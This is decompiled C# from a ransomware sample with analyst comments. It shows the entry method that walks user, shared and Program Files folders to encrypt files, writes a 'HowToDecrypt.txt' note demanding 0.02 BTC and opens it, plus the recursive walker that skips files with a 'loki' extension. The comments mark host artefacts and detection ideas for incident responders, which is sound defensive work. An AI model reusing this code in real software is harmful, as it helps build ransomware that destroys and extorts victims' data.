// Token: 0x06000192 RID: 402 RVA: 0x0000B804 File Offset: 0x00009A04
//
// Analyst notes (decompiled sample; code left exactly as recovered):
// Entry point of the file-encryption stage. It does two things in order:
//   1. Unless the marker file %ProgramData%\trig exists, walks a fixed list of
//      user and machine folders through RansomwareCrypt.GetFile.
//   2. Always writes a ransom note to the all-users desktop, shows the same
//      text in a dialog, then opens the note.
// Host artefacts visible in this method: the marker path "%ProgramData%\trig"
// and the note "HowToDecrypt.txt" in the common desktop directory.
// The payment address and version string come from Settings, which is not
// shown here, so they must be recovered from that class.
internal static void Start()
{
    // Marker check: when this file is present the whole encryption walk is skipped.
    // NOTE(review): nothing in this method creates "trig"; presumably it is written
    // elsewhere as a run-once flag. Confirm against the rest of the assembly before
    // treating its presence as evidence that encryption already ran.
    if (!File.Exists(Environment.GetEnvironmentVariable("ProgramData") + "\\trig"))
    {
        // Root folders handed to the recursive walker. The list mixes per-user
        // locations, all-users locations and both Program Files trees.
        // SpecialFolder.Personal appears twice, and UserProfile contains several of
        // the earlier entries, so the same directories are visited more than once.
        // For scoping an incident: every path below is a candidate for damaged files.
        string[] array = new string[]
        {
            Environment.GetFolderPath(Environment.SpecialFolder.Recent),
            Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
            Environment.GetFolderPath(Environment.SpecialFolder.MyPictures),
            Environment.GetFolderPath(Environment.SpecialFolder.MyMusic),
            Environment.GetFolderPath(Environment.SpecialFolder.MyVideos),
            Environment.GetFolderPath(Environment.SpecialFolder.Personal),
            Environment.GetFolderPath(Environment.SpecialFolder.Favorites),
            Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments),
            Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures),
            Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic),
            Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos),
            Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory),
            Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory),
            Environment.GetFolderPath(Environment.SpecialFolder.Personal),
            Environment.GetFolderPath(Environment.SpecialFolder.UserProfile),
            Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
            Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData),
            Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86),
            Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)
        };
        for (int i = 0; i < array.Length; i++)
        {
            RansomwareCrypt.GetFile(array[i]);
        }
    }
    // Ransom note drop. This runs even when the marker file suppressed the walk above,
    // so the note alone does not prove that files were encrypted on this host.
    // The write is not inside a try/catch in this method, so a failure here throws to
    // the caller and the dialog and Process.Start below are never reached.
    // The version string is passed through crypt.AESDecript before being embedded,
    // which suggests Settings.Stealer_version is stored encrypted in the binary.
    File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt", string.Concat(new string[]
    {
        "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer:",
        crypt.AESDecript(Settings.Stealer_version),
        "\nTo Decrypt: \n - Send 0.02 BTC to: ",
        Settings.bitcoin_keshel,
        "\n- Follow All Steps"
    }), Encoding.UTF8);
    // Fixed two-second pause between writing the note and showing the dialog.
    Thread.Sleep(2000);
    // Dialog with nearly the same text as the note. Unlike the note, the version string
    // is used here without crypt.AESDecript, so the dialog may display the stored
    // (still encoded) value; the literals also differ slightly in spacing.
    // MessageBox.Show blocks until the user dismisses the dialog.
    MessageBox.Show(string.Concat(new string[]
    {
        "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer: ",
        Settings.Stealer_version,
        "\nTo Decrypt: \n - Send 0.02 BTC to: ",
        Settings.bitcoin_keshel,
        "\n - Follow All Steps"
    }));
    // Opens the note by path, presumably through the registered .txt handler.
    // Detection idea: a text viewer launched by this process with HowToDecrypt.txt
    // on its command line, shortly after a burst of file writes in the folders above.
    Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt");
}
// Token: 0x06000191 RID: 401 RVA: 0x0000B794 File Offset: 0x00009994
//
// Analyst notes (decompiled sample; code left exactly as recovered):
// Recursive directory walker. For the directory in string_1 it passes every file
// whose extension does not contain "loki" to RansomwareCrypt.EncryptFiles, then
// calls itself on each subdirectory. EncryptFiles is not shown here.
// NOTE(review): the "loki" test presumably skips files this sample has already
// processed, which would make an extension containing "loki" a file-system
// indicator. Confirm against EncryptFiles.
public static void GetFile(string string_1)
{
    try
    {
        foreach (string text in Directory.GetFiles(string_1))
        {
            // string.Contains is an ordinal, case-sensitive substring match, so only
            // extensions containing lowercase "loki" are skipped.
            if (!Path.GetExtension(text).Contains("loki"))
            {
                RansomwareCrypt.EncryptFiles(text);
            }
        }
        // Depth-first descent; there is no depth limit or exclusion list in this method.
        string[] array = Directory.GetDirectories(string_1);
        for (int i = 0; i < array.Length; i++)
        {
            RansomwareCrypt.GetFile(array[i]);
        }
    }
    catch (Exception)
    {
        // Every exception is swallowed. One try block covers both loops, so the first
        // failure (for example access denied, or anything thrown by EncryptFiles) ends
        // processing of this directory: the remaining files and all subdirectories are
        // left untouched. Responders should therefore expect partially affected
        // directories and no error output from this stage.
    }
}